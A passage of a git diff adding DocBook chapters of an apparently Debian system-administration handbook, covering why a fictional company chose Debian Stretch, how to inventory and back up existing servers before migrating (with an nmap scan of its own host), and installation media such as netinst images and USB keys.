+    the user services (file sharing, Web, SMTP, etc.). Then the office
+    computers will be gradually migrated to Debian, for each
+    department to be trained (internally) during the deployment of the
+    new system.</para>
+  </section>
+  <section id="sect.why-gnu-linux">
+    <title>Why a GNU/Linux Distribution?</title>
+
+    <sidebar>
+      <title><emphasis>BACK TO BASICS</emphasis> Linux or GNU/Linux?</title>
+      <indexterm><primary>GNU/Linux</primary></indexterm>
+      <indexterm><primary>Linux</primary></indexterm>
+
+      <para>Linux, as you already know, is only a kernel. The expressions,
+      “Linux distribution” and “Linux system” are, thus, incorrect:
+      they are, in reality, distributions or systems <emphasis>based
+      on</emphasis> Linux. These expressions fail to mention the software
+      that always completes this kernel, among which are the programs
+      developed by the GNU Project. Dr. Richard Stallman, founder of this
+      project, insists that the expression “GNU/Linux” be
+      systematically used, in order to better recognize the important
+      contributions made by the GNU Project and the principles of freedom
+      upon which they are founded.</para>
+
+      
+      <para>Debian has chosen to follow this recommendation, and, thus,
+      name its distributions accordingly (thus, the latest stable release
+      is Debian GNU/Linux 9).</para>
+    </sidebar>
+
+    <para>Several factors have dictated this choice. The system
+    administrator, who was familiar with this distribution, ensured it
+    was listed among the candidates for the computer system
+    overhaul. Difficult economic conditions and ferocious competition
+    have limited the budget for this operation, despite its critical
+    importance for the future of the company. This is why Open Source
+    solutions were swiftly chosen: several recent studies indicate
+    they are less expensive than proprietary solutions while providing
+    equal or better quality of service so long as qualified personnel
+    are available to run them.</para>
+
+    <sidebar>
+      <title><emphasis>IN PRACTICE</emphasis> Total cost of ownership (TCO)</title>
+      <indexterm><primary>TCO</primary></indexterm>
+      <indexterm><primary>Total Cost of Ownership</primary></indexterm>
+
+      <para>The Total Cost of Ownership is the total of all money expended
+      for the possession or acquisition of an item, in this case referring
+      to the operating system. This price includes any possible license fee,
+      costs for training personnel to work with the new software,
+      replacement of machines that are too slow, additional repairs, etc.
+      Everything arising directly from the initial choice is taken into
+      account.</para>
+
+      <para>This TCO, which varies according to the criteria chosen in
+      the assessment thereof, is rarely significant when taken in
+      isolation. However, it is very interesting to compare TCOs for
+      different options if they are calculated according to the same
+      rules. This assessment table is, thus, of paramount importance,
+      and it is easy to manipulate it in order to draw a predefined
+      conclusion.  Thus, the TCO for a single machine doesn't make
+      sense, since the cost of an administrator is also reflected in
+      the total number of machines they manage, a number which
+      obviously depends on the operating system and tools
+      proposed.</para>
+    </sidebar>
+
+    <para>Among free operating systems, the IT department looked at
+    the free BSD systems (OpenBSD, FreeBSD, and NetBSD), GNU Hurd, and
+    Linux distributions. GNU Hurd, which has not yet released a stable
+    version, was immediately rejected. The choice is simpler between
+    BSD and Linux.  The former have many merits, especially on
+    servers. Pragmatism, however, led to choosing a Linux system,
+    since its installed base and popularity are both very significant
+    and have many positive consequences. One of these consequences is
+    that it is easier to find qualified personnel to administer Linux
+    machines than technicians experienced with BSD. Furthermore, Linux
+    adapts to newer hardware faster than BSD (although they are often
+    neck and neck in this race).  Finally, Linux distributions are
+    often more adapted to user-friendly graphical user interfaces,
+    indispensable for beginners during migration of all office
+    machines to a new system.</para>
+
+    <sidebar>
+      <title><emphasis>ALTERNATIVE</emphasis> Debian GNU/kFreeBSD</title>
+      <indexterm><primary>kFreeBSD</primary></indexterm>
+      <indexterm><primary>FreeBSD</primary></indexterm>
+      <indexterm><primary>BSD</primary></indexterm>
+
+      
+      <para>Since Debian 6 <emphasis role="distribution">Squeeze</emphasis>, it is possible to use
+      Debian with a FreeBSD kernel on 32 and 64 bit computers; this is
+      what the <literal>kfreebsd-i386</literal> and
+      <literal>kfreebsd-amd64</literal> architectures mean. While
+      these architectures are not “official release architectures”,
+      about 90 % of the software packaged by Debian is available for
+      them.</para>
+
+      <para>These architectures may be an appropriate choice for Falcot
+      Corp administrators, especially for a firewall (the kernel supports
+      three different firewalls: IPF, IPFW, PF) or for a NAS (network
+      attached storage system, for which the ZFS filesystem has been tested
+      and approved).</para>
+    </sidebar>
+  </section>
+  <section id="sect.why-debian">
+    <title>Why the Debian Distribution?</title>
+
+    <para>Once the Linux family has been selected, a more specific
+    option must be chosen. Again, there are plenty of criteria to
+    consider. The chosen distribution must be able to operate for
+    several years, since the migration from one to another would
+    entail additional costs (although less than if the migration were
+    between two totally different operating systems, such as Windows
+    or OS X).</para>
+
+    <para>Sustainability is, thus, essential, and it must guarantee regular
+    updates and security patches over several years. The timing of updates
+    is also significant, since, with so many machines to manage, Falcot
+    Corp can not handle this complex operation too frequently. The IT
+    department, therefore, insists on running the latest stable version of
+    the distribution, benefiting from the best technical assistance, and
+    guaranteed security patches. In effect, security updates are generally
+    only guaranteed for a limited duration on older versions of a
+    distribution.</para>
+
+    <para>
+      Finally, for reasons of homogeneity and ease of administration,
+      the same distribution must run on all the servers and office
+      computers.
+    </para>
+
+    <section>
+      <title>Commercial and Community Driven Distributions</title>
+
+      <para>There are two main categories of Linux distributions:
+      commercial and community driven. The former, developed by companies,
+      are sold with commercial support services. The latter are developed
+      according to the same open development model as the free software of
+      which they are comprised.</para>
+
+      <para>A commercial distribution will have, thus, a tendency to
+      release new versions more frequently, in order to better market
+      updates and associated services. Their future is directly connected
+      to the commercial success of their company, and many have already
+      disappeared (Caldera Linux, StormLinux, Mandriva Linux, etc.).</para>
+
+      <para>A community distribution doesn't follow any schedule but its
+      own. Like the Linux kernel, new versions are released when they are
+      stable, never before. Its survival is guaranteed, as long as it has
+      enough individual developers or third party companies to support
+      it.</para>
+      <indexterm><primary>distribution</primary><secondary>community Linux distribution</secondary></indexterm>
+      <indexterm><primary>distribution</primary><secondary>commercial Linux distribution</secondary></indexterm>
+
+      <para>A comparison of various Linux distributions led to the choice
+      of Debian for various reasons:</para>
+      <itemizedlist>
+        <listitem>
+	  <para>It is a community distribution, with development ensured
+	  independently from any commercial constraints; its objectives
+	  are, thus, essentially of a technical nature, which seem to favor
+	  the overall quality of the product.</para>
+        </listitem>
+        <listitem>
+	  <para>Of all community distributions, it is the most significant
+	  from many perspectives: in number of contributors, number of
+	  software packages available, and years of continuous existence.
+	  The size of its community is an incontestable witness to its
+	  continuity.</para>
+        </listitem>
+        <listitem>
+	  <para>Statistically, new versions are released every 18 to 24
+          months, and they are supported for 5 years, a schedule which
+          is agreeable to administrators.</para>
+        </listitem>
+        <listitem>
+	  <para>A survey of several French service companies specialized in
+	  free software has shown that all of them provide technical
+	  assistance for Debian; it is also, for many of them, their chosen
+	  distribution, internally. This diversity of potential providers
+	  is a major asset for Falcot Corp's independence.</para>
+        </listitem>
+        <listitem>
+	  <para>Finally, Debian is available on a multitude of
+          architectures, including ppc64el for OpenPOWER processors; it
+          will, thus, be possible to install it on Falcot Corp's latest
+          IBM servers.</para>
+        </listitem>
+      </itemizedlist>
+
+      <sidebar>
+        <title><emphasis>IN PRACTICE</emphasis> Debian Long Term Support</title>
+        <para>The Debian Long Term Support (LTS) project started in 2014
+        and aims to provide 5 years of security support to all stable
+        Debian releases. As LTS is of primary importance to
+        organizations with large deployments, the project tries to pool
+        resources from Debian-using companies.
+        <ulink type="block" url="https://wiki.debian.org/LTS" />
+        </para>
+        <para>Falcot Corp is not big enough to let one member of its IT staff
+        contribute to the LTS project, so the company opted to subscribe
+        to Freexian's Debian LTS contract and provides financial support.
+        Thanks to this, the Falcot administrators know that the packages
+        they use will be handled in priority and they have a direct
+        contact with the LTS team in case of problems.
+        <ulink type="block" url="https://wiki.debian.org/LTS/Funding" />
+        <ulink type="block" url="https://www.freexian.com/services/debian-lts.html" />
+        </para>
+      </sidebar>
+
+      <para>Once Debian has been chosen, the matter of which version to use
+      must be decided. Let us see why the administrators have picked Debian
+      Stretch.</para>
+    </section>
+  </section>
+  <section id="sect.why-debian-stable">
+    <title>Why Debian Stretch?</title>
+
+    <para>Every Debian release starts its life as a continuously
+    changing distribution, also known as “<emphasis role="distribution">Testing</emphasis>”. But at the time we write
+    those lines, Debian Stretch is the latest “<emphasis role="distribution">Stable</emphasis>” version of Debian.</para>
+
+    <para>The choice of Debian Stretch is well justified based on the fact
+    that any administrator concerned about the quality of their servers
+    will naturally gravitate towards the stable version of Debian.
+    Even if the previous stable release might still be supported for a
+    while, Falcot administrators aren't considering it because its
+    support period will not last long enough and because the latest
+    version brings new interesting features that they care about.</para>
+  </section>
+</chapter>
diff --git a/tmp/cs-CZ/xml_tmp/03_existing-setup.xml b/tmp/cs-CZ/xml_tmp/03_existing-setup.xml
new file mode 100644
index 000000000..c4633f6fe
--- /dev/null
+++ b/tmp/cs-CZ/xml_tmp/03_existing-setup.xml
@@ -0,0 +1,431 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="existing-setup">
+  <chapterinfo>
+    <mediaobject condition="pdf">
+      <imageobject>
+        <imagedata fileref="images/chap-existing-setup.png" scalefit="1" />
+      </imageobject>
+    </mediaobject>
+    <keywordset>
+      <keyword>Existing Setup</keyword>
+      <keyword>Reuse</keyword>
+      <keyword>Migration</keyword>
+    </keywordset>
+  </chapterinfo>
+  <title>Analyzing the Existing Setup and Migrating</title>
+  <highlights>
+    <para>Any computer system overhaul should take the existing system into
+    account. This allows reuse of available resources as much as possible
+    and guarantees interoperability of the various elements comprising the
+    system. This study will introduce a generic framework to follow in any
+    migration of a computing infrastructure to Linux.</para>
+  </highlights>
+  <section id="sect.heterogeneous-environments">
+    <title>Coexistence in Heterogeneous Environments</title>
+    <indexterm><primary>environment</primary><secondary>heterogeneous environment</secondary></indexterm>
+
+    <para>Debian integrates very well in all types of existing environments
+    and plays well with any other operating system. This near-perfect
+    harmony comes from market pressure which demands that software
+    publishers develop programs that follow standards. Compliance with
+    standards allows administrators to switch out programs: clients or
+    servers, whether free or not.</para>
+    <section>
+      <title>Integration with Windows Machines</title>
+
+      <para>Samba's SMB/CIFS support ensures excellent communication within
+      a Windows context. It shares files and print queues to Windows
+      clients and includes software that allow a Linux machine to use
+      resources available on Windows servers.</para>
+
+      <sidebar>
+        <title><emphasis>TOOL</emphasis> Samba</title>
+        <indexterm><primary>Samba</primary></indexterm>
+
+        <para>The latest version of Samba can replace most of
+        the Windows features: from those of a simple Windows NT server
+	(authentication, files, print queues, downloading printer
+        drivers, DFS, etc.) to the most advanced one (a domain controller
+        compatible with Active Directory).
+	</para>
+      </sidebar>
+    </section>
+    <section>
+      <title>Integration with OS X machines</title>
+
+      <indexterm><primary>Zeroconf</primary></indexterm>
+      <indexterm><primary>Bonjour</primary></indexterm>
+      <indexterm><primary>Avahi</primary></indexterm>
+      <para>OS X machines provide, and are able to use, network
+      services such as file servers and printer sharing.  These
+      services are published on the local network, which allows other
+      machines to discover them and make use of them without any
+      manual configuration, using the Bonjour implementation of the
+      Zeroconf protocol suite.  Debian includes another
+      implementation, called Avahi, which provides the same
+      functionality.
+      </para>
+
+      <indexterm><primary>AFP</primary></indexterm>
+      <indexterm><primary>AppleShare</primary></indexterm>
+      <para>In the other direction, the Netatalk daemon can be used to
+      provide file servers to OS X machines on the network.  It
+      implements the AFP (AppleShare) protocol as well as the required
+      notifications so that the servers can be autodiscovered by the
+      OS X clients.</para>
+
+      <indexterm><primary>AppleTalk</primary></indexterm>
+      <para>Older Mac OS networks (before OS X) used a different protocol
+      called AppleTalk.  For environments involving machines using
+      this protocol, Netatalk also provides the AppleTalk protocol
+      (in fact, it started as a reimplementation of that protocol). It
+      ensures the operation of the file server and print queues, as
+      well as time server (clock synchronization). Its router function
+      allows interconnection with AppleTalk networks.</para>
+    </section>
+    <section>
+      <title>Integration with Other Linux/Unix Machines</title>
+
+      <para>Finally, NFS and NIS, both included, guarantee interaction with
+      Unix systems. NFS ensures file server functionality, while NIS
+      creates user directories. The BSD printing layer, used by most Unix
+      systems, also allows sharing of print queues.</para>
+
+      <figure>
+        <title>Coexistence of Debian with OS X, Windows and Unix systems</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/existing-setup-1.png" width="25%" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+    </section>
+  </section>
+  <section id="sect.how-to-migrate">
+    <title>How To Migrate</title>
+    <indexterm><primary>migration</primary></indexterm>
+
+    <para>In order to guarantee continuity of the services, each
+    computer migration must be planned and executed according to the
+    plan.  This principle applies whatever the operating system
+    used.</para>
+    <section>
+      <title>Survey and Identify Services</title>
+
+      <para>As simple as it seems, this step is essential. A serious
+      administrator truly knows the principal roles of each server, but
+      such roles can change, and sometimes experienced users may have
+      installed “wild” services. Knowing that they exist will at least
+      allow you to decide what to do with them, rather than delete them
+      haphazardly.</para>
+
+      <para>For this purpose, it is wise to inform your users of the
+      project before migrating the server. To involve them in the
+      project, it may be useful to install the most common free
+      software programs on their desktops prior to migration, which
+      they will come across again after the migration to Debian; Libre
+      Office and the Mozilla suite are the best examples here.</para>
+      <section>
+        <title>Network and Processes</title>
+        <indexterm><primary><command>nmap</command></primary></indexterm>
+       
+	<para>The <command>nmap</command> tool (in the package with the same
+	name) will quickly identify Internet services hosted by a network
+	connected machine without even requiring to log in to it. Simply
+	call the following command on another machine connected to the same
+	network:</para>
+
+        <screen>
+<computeroutput>$ </computeroutput><userinput>nmap mirwiz</userinput>
+<computeroutput>Starting Nmap 7.40 ( https://nmap.org ) at 2017-06-06 14:41 CEST
+Nmap scan report for mirwiz (192.168.1.104)
+Host is up (0.00062s latency).
+Not shown: 992 closed ports
+PORT     STATE SERVICE
+22/tcp   open  ssh
+25/tcp   open  smtp
+80/tcp   open  http
+111/tcp  open  rpcbind
+139/tcp  open  netbios-ssn
+445/tcp  open  microsoft-ds
+5666/tcp open  nrpe
+9999/tcp open  abyss
+
+Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds</computeroutput>
+</screen>
+
+        <sidebar>
+          <title><emphasis>ALTERNATIVE</emphasis> Use <command>netstat</command> to find the list of available services</title>
+
+	  <para>On a Linux machine, the <command>netstat -tupan</command>
+	  command will show the list of active or pending TCP sessions, as
+	  well UDP ports on which running programs are listening. This
+	  facilitates identification of services offered on the
+	  network.</para>
+        </sidebar>
+
+        <sidebar>
+          <title><emphasis>GOING FURTHER</emphasis> IPv6</title>
+
+	  <para>Some network commands may work either with IPv4 (the
+	  default usually) or with IPv6.  These include the
+	  <command>nmap</command> and <command>netstat</command>
+	  commands, but also others, such as <command>route</command>
+	  or <command>ip</command>. The convention is that this
+	  behavior is enabled by the <parameter>-6</parameter>
+	  command-line option.</para>
+        </sidebar>
+
+	<para>If the server is a Unix machine offering shell accounts to
+	users, it is interesting to determine if processes are executed in
+	the background in the absence of their owner. The command
+	<command>ps auxw</command> displays a list of all processes with
+	their user identity. By checking this information against the
+	output of the <command>who</command> command, which gives a list of
+	logged in users, it is possible to identify rogue or undeclared servers or
+	programs running in the background. Looking at
+	<filename>crontabs</filename> (tables listing automatic actions
+	scheduled by users) will often provide interesting information on
+	functions fulfilled by the server (a complete explanation of
+	<command>cron</command> is available in <xref linkend="sect.task-scheduling-cron-atd" />).</para>
+
+	<para>In any case, it is essential to backup your servers: this
+	allows recovery of information after the fact, when users will
+	report specific problems due to the migration.</para>
+      </section>
+    </section>
+    <section>
+      <title>Backing up the Configuration</title>
+
+      <para>It is wise to retain the configuration of every identified
+      service in order to be able to install the equivalent on the
+      updated server. The bare minimum is to make a backup copy of the
+      configuration files.</para>
+
+      <para>For Unix machines, the configuration files are usually
+      found in <filename>/etc/</filename>, but they may be located in
+      a sub-directory of <filename>/usr/local/</filename>. This is the
+      case if a program has been installed from sources, rather than
+      with a package. In some cases, one may also find them under
+      <filename>/opt/</filename>.</para>
+
+      <para>For data managing services (such as databases), it is strongly
+      recommended to export the data to a standard format that will be easily
+      imported by the new software. Such a format is usually in text mode
+      and documented; it may be, for example, an SQL dump for a database,
+      or an LDIF file for an LDAP server.</para>
+
+      <figure>
+        <title>Database backups</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/existing-setup-2.png" width="50%" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+
+      <para>Each server software is different, and it is impossible to
+      describe all existing cases in detail. Compare the documentation
+      for the existing and the new software to identify the exportable
+      (thus, re-importable) portions and those which will require
+      manual handling. Reading this book will clarify the
+      configuration of the main Linux server programs.</para>
+    </section>
+    <section>
+      <title>Taking Over an Existing Debian Server</title>
+      <indexterm><primary>recovering a Debian machine</primary></indexterm>
+      <indexterm><primary>exploring a Debian machine</primary></indexterm>
+      <indexterm><primary>taking over a Debian server</primary></indexterm>
+
+      <para>To effectively take over its maintenance, one may analyze a
+      machine already running with Debian.</para>
+
+      <para>The first file to check is
+      <filename>/etc/debian_version</filename>, which usually contains the
+      version number for the installed Debian system (it is part of the
+      <emphasis>base-files</emphasis> package). If it indicates
+      <literal><replaceable>codename</replaceable>/sid</literal>, it means
+      that the system was updated with packages coming from one of the
+      development distributions (either testing or unstable).</para>
+
+      <para>The <command>apt-show-versions</command> program (from the
+      Debian package of the same name) checks the list of installed
+      packages and identifies the available versions.
+      <command>aptitude</command> can also be used for these tasks, albeit
+      in a less systematic manner.</para>
+
+      <para>A glance at the <filename>/etc/apt/sources.list</filename> file
+      (and <filename>/etc/apt/sources.list.d/</filename> directory)
+      will show where the installed Debian packages likely came from. If
+      many unknown sources appear, the administrator may choose to
+      completely reinstall the computer's system to ensure optimal
+      compatibility with the software provided by Debian.</para>
+
+      <para>The <filename>sources.list</filename> file is often a good
+      indicator: the majority of administrators keep, at least in comments,
+      the list of APT sources that were previously used. But you should not forget that
+      sources used in the past might have been deleted, and that some
+      random packages grabbed on the Internet might have been manually
+      installed (with the <command>dpkg</command> command). In this case,
+      the machine is misleading in its appearance of “standard” Debian.
+      This is why you should pay attention to any indication that will give
+      away the presence of external packages (appearance of
+      <filename>deb</filename> files in unusual directories, package
+      version numbers with a special suffix indicating that it originated
+      from outside the Debian project, such as <literal>ubuntu</literal> or
+      <literal>lmde</literal>, etc.)</para>
+
+      <para>Likewise, it is interesting to analyze the contents of the
+      <filename>/usr/local/</filename> directory, whose purpose is to contain
+      programs compiled and installed manually. Listing software installed
+      in this manner is instructive, since this raises questions on the
+      reasons for not using the corresponding Debian package, if such a
+      package exists.</para>
+
+      <sidebar>
+        <title><emphasis>QUICK LOOK</emphasis> <emphasis role="pkg">cruft</emphasis></title>
+
+	<para>The <emphasis role="pkg">cruft</emphasis> package proposes to
+	list the available files that are not owned by any package. It has
+	some filters (more or less effective, and more or less up to date)
+	to avoid reporting some legitimate files (files generated by Debian
+	packages, or generated configuration files not managed by
+	<command>dpkg</command>, etc.).</para>
+
+	<para>Be careful to not blindly delete everything that
+	<command>cruft</command> might list!</para>
+      </sidebar>
+    </section>
+    <section>
+      <title>Installing Debian</title>
+
+      <para>Once all the required information on the current server is
+      known, we can shut it down and begin to install Debian on
+      it.</para>
+      <indexterm><primary>architecture</primary></indexterm>
+
+      <para>To choose the appropriate version, we must know the
+      computer's architecture. If it is a reasonably recent PC, it is
+      most likely to be amd64 (older PCs were usually i386). In other
+      cases, we can narrow down the possibilities according to the
+      previously used system.</para>
+
+      <para><xref linkend="tab-corresp" xrefstyle="select: label nopage" /> is not
+      intended to be exhaustive, but may be helpful. In any case, the
+      original documentation for the computer is the most reliable source
+      to find this information.</para>
+
+      <table colsep="1" id="tab-corresp">
+        <title>Matching operating system and architecture</title>
+        <tgroup cols="2">
+          <thead>
+            <row>
+              <entry>Operating System</entry>
+              <entry>Architecture(s)</entry>
+            </row>
+          </thead>
+          <tbody>
+            <row>
+              <entry>DEC Unix (OSF/1)</entry>
+              <entry>alpha, mipsel</entry>
+            </row>
+            <row>
+              <entry>HP Unix</entry>
+              <entry>ia64, hppa</entry>
+            </row>
+            <row>
+              <entry>IBM AIX</entry>
+              <entry>powerpc</entry>
+            </row>
+            <row>
+              <entry>Irix</entry>
+              <entry>mips</entry>
+            </row>
+            <row>
+              <entry>OS X</entry>
+              <entry>amd64, powerpc, i386</entry>
+            </row>
+            <row>
+              <entry>z/OS, MVS</entry>
+              <entry>s390x, s390</entry>
+            </row>
+            <row>
+              <entry>Solaris, SunOS</entry>
+              <entry>sparc, i386, m68k</entry>
+            </row>
+            <row>
+              <entry>Ultrix</entry>
+              <entry>mips</entry>
+            </row>
+            <row>
+              <entry>VMS</entry>
+              <entry>alpha</entry>
+            </row>
+            <row>
+              <entry>Windows 95/98/ME</entry>
+              <entry>i386</entry>
+            </row>
+            <row>
+              <entry>Windows NT/2000</entry>
+              <entry>i386, alpha, ia64, mipsel</entry>
+            </row>
+            <row>
+              <entry>Windows XP / Windows Server 2008</entry>
+              <entry>i386, amd64, ia64</entry>
+            </row>
+            <row>
+              <entry>Windows RT</entry>
+              <entry>armel, armhf, arm64</entry>
+            </row>
+            <row>
+              <entry>Windows Vista / Windows 7-8-10</entry>
+              <entry>i386, amd64</entry>
+            </row>
+          </tbody>
+        </tgroup>
+      </table>
+
+      <sidebar>
+        <title><emphasis>HARDWARE</emphasis> 64 bit PC vs 32 bit PC</title>
+        <indexterm><primary>amd64</primary></indexterm>
+        <indexterm><primary>i386</primary></indexterm>
+
+	<para>Most recent computers have 64 bit Intel or AMD
+	processors, compatible with older 32 bit processors; the
+	software compiled for “i386” architecture thus works. On the
+	other hand, this compatibility mode does not fully exploit the
+	capabilities of these new processors. This is why Debian
+	provides the “amd64” architecture, which works for recent AMD
+	chips as well as Intel “em64t” processors (including most of
+	the Core series), which are very similar to AMD64.</para>
+      </sidebar>
+    </section>
+    <section>
+      <title>Installing and Configuring the Selected Services</title>
+
+      <para>Once Debian is installed, we must install and configure one by
+      one all of the services that this computer must host. The new
+      configuration must take into consideration the prior one in order to
+      ensure a smooth transition. All the information collected in the
+      first two steps will be useful to successfully complete this part.</para>
+
+      <figure>
+        <title>Install the selected services</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/existing-setup-4.png" width="66%" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+
+      <para>Prior to jumping into this exercise with both feet, it is
+      strongly recommended that you read the remainder of this book. After
+      that you will have a more precise understanding of how to configure
+      the expected services.</para>
+
+      <para></para>
+    </section>
+  </section>
+</chapter>
diff --git a/tmp/cs-CZ/xml_tmp/04_installation.xml b/tmp/cs-CZ/xml_tmp/04_installation.xml
new file mode 100644
index 000000000..3b39f05bc
--- /dev/null
+++ b/tmp/cs-CZ/xml_tmp/04_installation.xml
@@ -0,0 +1,1326 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="installation">
+  <chapterinfo>
+    <mediaobject condition="pdf">
+      <imageobject>
+        <imagedata fileref="images/chap-installation.png" scalefit="1" />
+      </imageobject>
+    </mediaobject>
+    <keywordset>
+      <keyword>Installation</keyword>
+      <keyword>Partitioning</keyword>
+      <keyword>Formatting</keyword>
+      <keyword>File System</keyword>
+      <keyword>Boot Sector</keyword>
+      <keyword>Hardware Detection</keyword>
+    </keywordset>
+  </chapterinfo>
+  <title>Installation</title>
+  <highlights>
+    <para>To use Debian, you need to install it on a computer; this task is
+    taken care of by the <emphasis>debian-installer</emphasis> program. A
+    proper installation involves many operations. This chapter reviews them
+    in their chronological order.</para>
+  </highlights>
+  <indexterm><primary>installation</primary><secondary>of the system</secondary></indexterm>
+
+  <sidebar>
+    <title><emphasis>BACK TO BASICS</emphasis> A catch-up course in the appendices</title>
+
+    <para>Installing a computer is always simpler when you are familiar
+    with the way it works. If you are not, make a quick detour to <xref linkend="short-remedial-course" /> before reading this chapter.</para>
+  </sidebar>
+
+  <para>The installer for <emphasis role="distribution">Stretch</emphasis>
+  is based on <command>debian-installer</command>. Its modular design
+  enables it to work in various scenarios and allows it to evolve and adapt
+  to changes. Despite the limitations implied by the need to support a
+  large number of architectures, this installer is very accessible to
+  beginners, since it assists users at each stage of the process. Automatic
+  hardware detection, guided partitioning, and graphical user interfaces
+  have solved most of the problems that newbies used to face in the
+  early years of Debian.</para>
+  <indexterm><primary>installer</primary></indexterm>
+  <indexterm><primary><command>debian-installer</command></primary></indexterm>
+
+  <para>Installation requires 128 MB of RAM (Random Access Memory) and at
+  least 2 GB of hard drive space. All Falcot computers meet these
+  criteria. Note, however, that these figures apply to the installation of
+  a very limited system without a graphical desktop. A minimum of 512 MB
+  of RAM and 10 GB of hard drive space are really recommended for a basic
+  office desktop workstation.</para>
+
+  <sidebar>
+    <title><emphasis>BEWARE</emphasis> Upgrading from Jessie</title>
+
+    <para>If you already have Debian Jessie installed on your computer, this
+    chapter is not for you! Unlike other distributions, Debian allows
+    updating a system from one version to the next without having to
+    reinstall the system. Reinstalling, in addition to being unnecessary,
+    could even be dangerous, since it could remove already installed
+    programs.</para>
+
+    <para>The upgrade process will be described in <xref linkend="sect.dist-upgrade" />.</para>
+  </sidebar>
+  <section id="sect.installation-methods">
+    <title>Installation Methods</title>
+
+    <para>A Debian system can be installed from several types of media, as
+    long as the BIOS of the machine allows it. You can for instance boot
+    with a CD-ROM, a USB key, or even through a network.</para>
+
+    <sidebar>
+      <title><emphasis>BACK TO BASICS</emphasis> BIOS, the hardware/software interface</title>
+      <indexterm><primary>BIOS</primary></indexterm>
+      <indexterm><primary>Basic Input/Output System</primary></indexterm>
+
+      <para>BIOS (which stands for Basic Input/Output System) is a software
+      that is included in the motherboard (the electronic board connecting
+      all peripherals) and executed when the computer is booted, in order
+      to load an operating system (via an adapted bootloader). It stays in
+      the background to provide an interface between the hardware and the
+      software (in our case, the Linux kernel).</para>
+    </sidebar>
+    <section id="sect.install-cd">
+      <title>Installing from a CD-ROM/DVD-ROM</title>
+
+      <para>The most widely used installation method is from a CD-ROM
+      (or DVD-ROM, which behaves exactly the same way): the computer
+      is booted from this media, and the installation program takes
+      over.</para>
+
+      
+      <para>Various CD-ROM families have different purposes:
+      <emphasis>netinst</emphasis> (network installation) contains the
+      installer and the base Debian system; all other programs are
+      then downloaded. Its “image”, that is the ISO-9660 filesystem
+      that contains the exact contents of the disk, only takes up
+      about 150 to 280 MB (depending on architecture).
+      On the other hand, the complete set offers all packages and
+      allows for installation on a computer that has no Internet access;
+      it requires around 14 DVD-ROMs (or 3 Blu-ray disks). There is no
+      more official CD-ROMs set as they were really huge, rarely used and
+      now most of the computers use DVD-ROMs as well as CD-ROMs. But the
+      programs are divided among the disks
+      according to their popularity and importance; the first
+      disk will be sufficient for most installations, since it
+      contains the most used softwares.</para>
+
+      <para>There is a last type of image, known as <filename>mini.iso</filename>,
+      which is only available as a by-product of the installer. The image
+      only contains the minimum required to configure the network and everything
+      else is downloaded (including parts of the installer itself, which is why those
+      images tend to break when a new version of the installer is released).
+      Those images can be found on the normal Debian mirrors under the
+      <filename>dists/<replaceable>release</replaceable>/main/installer-<replaceable>arch</replaceable>/current/images/netboot/</filename>
+      directory.
+      </para>
+      <indexterm><primary><filename>mini.iso</filename></primary></indexterm>
+
+      <sidebar>
+        <title><emphasis>TIP</emphasis> Multi-architecture disks</title>
+
+	<para>Most installation CD- and DVD-ROMs work only with a specific
+	hardware architecture. If you wish to download the complete images,
+	you must take care to choose those which work on the hardware of
+	the computer on which you wish to install them.</para>
+
+	<para>Some CD/DVD-ROM images can work on several
+	architectures. We thus have a CD-ROM image combining the
+	<emphasis>netinst</emphasis> images of the
+	<emphasis>i386</emphasis> and <emphasis>amd64</emphasis>
+	architectures.</para>
+      </sidebar>
+      <indexterm><primary>CD-ROM</primary><secondary>installation CD-ROM</secondary></indexterm>
+      <indexterm><primary>CD-ROM</primary><secondary><emphasis>netinst CD-ROM</emphasis></secondary></indexterm>
+      <indexterm><primary>DVD-ROM</primary><secondary>installation DVD-ROM</secondary></indexterm>
+      <indexterm><primary>DVD-ROM</primary><secondary><emphasis>netinst DVD-ROM</emphasis></secondary></indexterm>
+
+      <para>To acquire Debian CD-ROM images, you may of course download
+      them and burn them to disk. You may also purchase them, and, thus,
+      provide the project with a little financial support. Check the
+      website to see the list of DVD-ROM image vendors and download sites.
+      <ulink type="block" url="http://www.debian.org/CD/index.html" />
+      </para>
+    </section>
+    <section id="sect.install-usb">
+      <title>Booting from a USB Key</title>
+      <indexterm><primary>USB key</primary></indexterm>
+
+      <para>Since most computers are able to boot from USB devices, you
+      can also install Debian from a USB key (this is nothing more than a
+      small flash-memory disk).</para>
+
+      <para>The installation manual explains how to create a USB key
+      that contains the <command>debian-installer</command>. The procedure
+      is very simple because ISO images for i386 and amd64 are hybrid
+      images that can boot from a CD-ROM as well as from a USB key.</para>
+
+      <para>You must first identify the device name of the USB key
+      (ex: <literal>/dev/sdb</literal>); the simplest means to do this
+      is to check the messages issued by the kernel using the
+      <command>dmesg</command> command. Then you must copy the
+      previously downloaded ISO image (for example
+      debian-9.0.0-amd64-netinst.iso) with the command
+      <command>cat debian-9.0.0-amd64-netinst.iso &gt;/dev/sdb;
+      sync</command>.  This command requires administrator rights,
+      since it accesses the USB key directly and blindly erases its
+      content.</para>
+
+      <para>A more detailed explanation is available in the installation
+      manual. Among other things, it describes an alternative method of
+      preparing a USB key that is more complex, but that allows to
+      customize the installer's default options (those set in the kernel
+      command line). <ulink type="block" url="http://www.debian.org/releases/stable/amd64/ch04s03.html" /></para>
+    </section>
+    <section id="sect.install-net">
+      <title>Installing through Network Booting</title>
+      <indexterm><primary>installation</primary><secondary><emphasis>netboot installation</emphasis></secondary></indexterm>
+      <indexterm><primary>installation</primary><secondary><emphasis>PXE installation</emphasis></secondary></indexterm>
+      <indexterm><primary>installation</primary><secondary><emphasis>TFTP installation</emphasis></secondary></indexterm>
+
+      <para>Many BIOSes allow booting directly from the network by
+      downloading a kernel and a minimal filesystem image. This method
